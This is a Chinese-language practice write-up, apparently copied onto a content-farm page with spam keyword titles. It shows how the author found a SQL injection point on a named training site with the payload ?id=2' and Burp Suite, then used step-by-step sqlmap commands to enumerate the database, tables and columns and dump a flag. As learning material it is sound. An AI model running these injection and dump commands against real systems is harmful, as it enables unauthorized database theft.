当前位置: 首页 > news >正文

龙之向导免费网站百度云盘资源搜索

龙之向导免费网站,百度云盘资源搜索,怎样做网站代理,特种作业操作证查询网官网使用sqlmap burpsuite sql工具注入拿flag 记录一下自己重新开始学习web安全之路③。 目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/ 首先判断网站是否存在SQL注入漏洞 1.找交互点 发现只有url这一个交互点,搜索框和登录…

使用sqlmap + burpsuite sql工具注入拿flag

记录一下自己重新开始学习web安全之路③。
目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/

首先判断网站是否存在SQL注入漏洞

1.找交互点

发现只有url这一个交互点,搜索框和登录框都没有。

2.找注入点

1

在唯一的交互点url中输入?id=2‘

2

发现回显不正常,说明该url是一个注入点

打开burpsuite 的抓包功能,在url中输入?id=2’,开始抓包。

3

使用sqlmap工具。

1.查看数据库名称(message)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” --current-db

–current-db //列出当前所有数据库名称

db // datebase

4

2.查看数据表名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message --tables

-D //指定数据库名称

–tables // 列出所有的数据表

5

3.查看数据列名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag --columns

-D //指定数据库名称

-T // 指定数据表名称

–columns // 列出所有的列

6

4.查看数据

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag -C flag --dump

-D //指定数据库名称

-T // 指定数据表名称

-C // 指定数据列名称

–dump // 读取数据

7

MD5解密

8

遇到的问题

抓到的包必须是注入点的包,不然用sqlmap的时候,会报错。

9

http://www.mmbaike.com/news/311.html

相关文章:

  • 聊城哪有做网站的seo优化中以下说法正确的是
  • 网站服务器年线太长磁力
  • APP加网站建设预算多少钱深圳市seo网络推广哪家好
  • 哪家做的濮阳网站建设百度快速收录权限域名
  • 云南省建设工程网站济南seo排名优化推广
  • 哪家外贸网站做的好网页快速收录
  • 网站上如何做跳转页面chatgpt 网站
  • 宝洁公司网站做的怎么样不受限制的浏览器
  • 网站设计需求方案竞价推广员月挣多少
  • 郑州网站建设中国建设建设银行百度网站的网址是什么
  • 给公众号做头像的网站北京网站推广营销服务电话
  • 公司官网是通过什么编辑seo网站外链工具
  • 花都网站建设设计网站空间费用一年多少
  • 做论坛网站怎么赚钱吗北京搜索引擎关键词优化
  • wordpress pv 性能优化seo培训班
  • 北京做网站需要多少钱b站视频推广app
  • 安庆 做网站小程序开发一个多少钱啊
  • 做网站怎么买服务器吗专业培训seo的机构
  • 微营销推广seo论坛站长交流
  • 成都酒店网站建设百度自动点击器
  • 薄荷网wordpress全网搜索引擎优化
  • xp花生壳做自己的网站自己建网站怎么推广
  • 电子商务网站建设背景优化公司结构
  • 网址升级中seo排名培训
  • 软件系统开发平台漳州seo网站快速排名
  • 1024d wordpress安卓优化神器
  • 传统企业营销型网站建设软文代写兼职
  • 长沙多地发布最新通告seo宣传
  • 南宁网站制作计划市场营销咨询
  • 衡水网站建seo推广有哪些